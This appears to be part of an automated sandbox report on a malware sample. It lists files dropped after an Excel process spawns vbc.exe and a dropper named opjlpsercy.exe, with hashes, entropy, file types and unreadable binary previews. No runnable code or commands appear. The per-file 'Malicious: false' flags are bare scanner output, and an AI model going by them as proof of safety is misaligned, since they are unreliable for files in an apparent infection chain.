MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8840ECDA.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9675EE9F.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	648132
Entropy (8bit):	2.8124530118203914
Encrypted:	false
SSDEEP:	3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
MD5:	955A9E08DFD3A0E31C7BCF66F9519FFC
SHA1:	F677467423105ACF39B76CB366F08152527052B3
SHA-256:	08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
SHA-512:	39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+@..$..........?...........?.........@...........@..........@..$..........?....

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\ADC419F8.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B740DAFD.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C9DF6E5B.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	50311
Entropy (8bit):	7.960958863022709
Encrypted:	false
SSDEEP:	768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
MD5:	4141C7515CE64FED13BE6D2BA33299AA
SHA1:	B290F533537A734B7030CE1269AC8C5398754194
SHA-256:	F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
SHA-512:	74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
Malicious:	false
Preview:	.PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..\|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..\|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.\|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D33DCA0.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E129F421.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EAF4E313.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	79394
Entropy (8bit):	7.864111100215953
Encrypted:	false
SSDEEP:	1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
MD5:	16925690E9B366EA60B610F517789AF1
SHA1:	9F3FE15AE44644F9ED8C2CA668B7020DF726426B
SHA-256:	C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
SHA-512:	AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
Malicious:	false
Preview:	.PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..MA..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z._....\|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}\|.._...>r.v~..G..)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}\|.._...>r.v~..G..)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..\|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EE977814.emf Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	7608
Entropy (8bit):	5.091127811854214
Encrypted:	false
SSDEEP:	96:+SDjyLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5Djr+sW31RGtdVDYM3VfmkpH
MD5:	EB06F07412A815AED391F20298C1087B
SHA1:	AC0601FFC173F50B56C3AE2265C61B76711FBE01
SHA-256:	5CA81C391E8CA113254221D535BE4E0677908DA61DE0016EC963DD443F535FDE
SHA-512:	38AEF603FAC0AB6FB7159EBA5B48BD7E191A433739710AEACB11538E51ADA5E99CD724BE5B3886986FCBB02375B0C132B0C303AE8838602BCE88475DDD727A49
Malicious:	false
Preview:	....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I....................................................v.Ze..............%f^..................Y...Y.'.wq....\.....Y.......Y.@.Y.W.wq......Y..6.v_.wq......wq.Ze.4.g^..Y...f^0.g^......g^..f^........4.g^@.Y...f^......f^..........g^..Y.......g^4tf^..g^............<..u.Z.v.....Ze......Ze........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4AF23EC.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	84203
Entropy (8bit):	7.979766688932294
Encrypted:	false
SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD9F8BAE.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	51166
Entropy (8bit):	7.767050944061069
Encrypted:	false
SSDEEP:	1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
MD5:	8C29CF033A1357A8DE6BF1FC4D0B2354
SHA1:	85B228BBC80DC60D40F4D3473E10B742E7B9039E
SHA-256:	E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
SHA-512:	F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
Malicious:	false
Preview:	.PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...\|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......

C:\Users\user\AppData\Local\Temp\eq64oqvr7vut3n4dt5cu Download File
Process:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
File Type:	data
Category:	dropped
Size (bytes):	616448
Entropy (8bit):	7.999692733314968
Encrypted:	true
SSDEEP:	12288:2Ph/JQuO9xgeB2Q54fr2dM4av0CGBmhFoqS3UDmhcOQV5eZTr:6diuMxgy6frQuv0L0hFoqSkDmhcOsS/
MD5:	7A73EF366D5F76E92D47C3064D0E3A26
SHA1:	C7638BBDAB4934280BD2A5F5B004623568BBD876
SHA-256:	55713D87E066560138EB389AB6FE3DB6EA642EB5C0149992FC99A38D09AA86B4
SHA-512:	908A167E2692BA331A06770A818FA9C2A7CB325374A2EEA086FB499B6069B6B7D0C6667D49BB49DDC5877B8A2BA22ABF9E0AF531A38487058CBBF7408D9C1906
Malicious:	false
Preview:	}.........e... 6..5Ckz...p.wB....}...e..O./r.5R..r.V..;]A.N..Jgmi...Z%r.R.)4...-4..pYG.q..by.......\|.=~_+xi.@N...+<.!.R.m.f~}..!.(C.......[.4@?1..._.l.5....l......+..cy..+]...U.u5...f.}n....t.F. =..$d..D...GX...0H..J6...J.BT..%...O..t.'P....f.....u..._<.f&(Z.K....^..W.?...?..k.k@...z.....O.R..N..JsI.)i.8n.:...k..`..]...,3.[j.{UE...>.Q.]J-...(..G~....%p...x...~.Gv...........t.........3..:U3.FG..$rr.)......_....2.!.o.B......~....'.x...c..V43....,].0L{.KIl0....d0...4.....#..._P.T+..ROQ...3..1.Z...)._.G,......>.`.......c.b]..B.....j....?..+.F..P?..........[p/\u.3..Q.j..d....<+...~S....t..:=Z...!U.)H..+.X..R.F.;E.w.k@G.pE[6..,.d....P.z...s.YQ..@..6....~M.f`....,-.l=..........:.(...j7..7p...P\|=...x..Kbl...........[..Y.s...FG.b.x...(.....Ol.)....,.p.....3jx..#X..2..q...G...W(D~r..KuoH...@Toi[....*h"g.e...=.<g..W/.4.~.Z..tH....H.i......;..om.C.5+S...E.........../.V.,..&\|...i....9W".~..&..,.?.w B.9......}....7&.JjFU.......E'.........

C:\Users\user\AppData\Local\Temp\fonknpk Download File
Process:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
File Type:	data
Category:	dropped
Size (bytes):	60113
Entropy (8bit):	4.930356039937102
Encrypted:	false
SSDEEP:	1536:Fqa448V8tJKh6oKyLiTltDtnbBZdZzzzhxaWFg:0amCJKh6onaltDtn9nZzzWz
MD5:	E25AE6DAF4BB7B1AA0EF37BBC646B782
SHA1:	5C728BDBDC69527306370AECC6D5C268523F043B
SHA-256:	61CA2BDC62BD28E9B004B7F109F66FC8B0344A24FFDBF50EBBB0106A54865B01
SHA-512:	1A1DA41FDB905C7D54877E9E16F71FF37662BE2AB6A1C1E2AC46BC7600ECEB6323894839424C7A7A06C2FC366BB0A59F070BD56AD3CE1070335CBA56AB88051A
Malicious:	false
Preview:	U..!.......T...%.U...h.V...<.W...,.X...,.Y.....Z.....[...(.\.....]...n.^...0._...,.`.....a.....b...(.c.....d...(.e...x.f...#.g...,.h...,.i.....j.....k.....l...,.m...c.n.....o...d.p...<.q...,.r...,.s...,.t.....u.....v...H.w.....x.....y.....z.....{.....\|...d.}...,.~.........2.......................b.....,.....,...........................................................d.......................d.....'.....P.....c...........l...........,.....,.....,.......................+.....+.....+.................p.................l.....,...........2.................p.....b.....,.....,.................p.......................p.................l.......................l.....'.....P.....c.................$.....,.....,.....,.......................+.....+.....+.................x.......................,...........2.................x.....b.....,.....,.................x

C:\Users\user\AppData\Local\Temp\nse21F3.tmp Download File
Process:	C:\Users\user\AppData\Roaming\monsuyajo\opjlpsercy.exe
File Type:	data
Category:	dropped
Size (bytes):	677854
Entropy (8bit):	7.91702747805609
Encrypted:	false
SSDEEP:	12288:4Ph/JQuO9xgeB2Q54fr2dM4av0CGBmhFoqS3UDmhcOQV5eZTB6oIL:cdiuMxgy6frQuv0L0hFoqSkDmhcOsS9a
MD5:	DD79AD8B5A51E756E3D0A2E149070DAA
SHA1:	9A999AE83C3078E311859D2AC02D97C8A95D4A51
SHA-256:	90B79E2B60E81A85EAFEA954724DD02BA7FAAF8CE63A3AD5C94BE5CDE5CE4256
SHA-512:	3F56D2AFEB344DC19DDEA59A8504366D1E118F2B4824CBC0E967D22BC2E616A726E7C846AABE7A3ED602B6328CB82A7338D4F97114DEC67FB896780A43E16D5F
Malicious:	false
Preview:	.S......,.......................T=.......S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsjBD86.tmp Download File
Process:	C:\Users\Public\vbc.exe
File Type:	data
Category:	dropped
Size (bytes):	709852
Entropy (8bit):	7.87001429899952
Encrypted:	false
SSDEEP:	12288:4Ph/JQuO9xgeB2Q54fr2dM4av0CGBmhFoqS3UDmhcOQV5eZTB6oI5BN:cdiuMxgy6frQuv0L0hFoqSkDmhcOsS98
MD5:	AEF5690996B3714098A9E0B69D9E5828
SHA1:	24B935683ECD3F3AF9F9EFE2620D6D05EFFED89C
SHA-256:	DBAADCC0481847BAB4237EDCF2F4990A047D5821BDFE186931103EAF17250101
SHA-512:	1F4A7C2FBD9553F7771B30CB907F7BAF3F4CF89450D9A79272250BA986CF92A249BE5E79827D332F709CEA8229EF37043F4236C626FDB82150EFD7AFE4D9DBED
Malicious:	false
Preview:	.S......,.......................T=.......S.......S..........................................................................................................................................................................................................................................J...................j...............................................................................................................................q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsjBD87.tmp\System.dll Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.855045165595541
Encrypted:	false
SSDEEP:	192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
MD5:	FCCFF8CB7A1067E23FD2E2B63971A8E1
SHA1:	30E2A9E137C1223A78A0F7B0BF96A1C361976D91
SHA-256:	6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
SHA-512:	F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
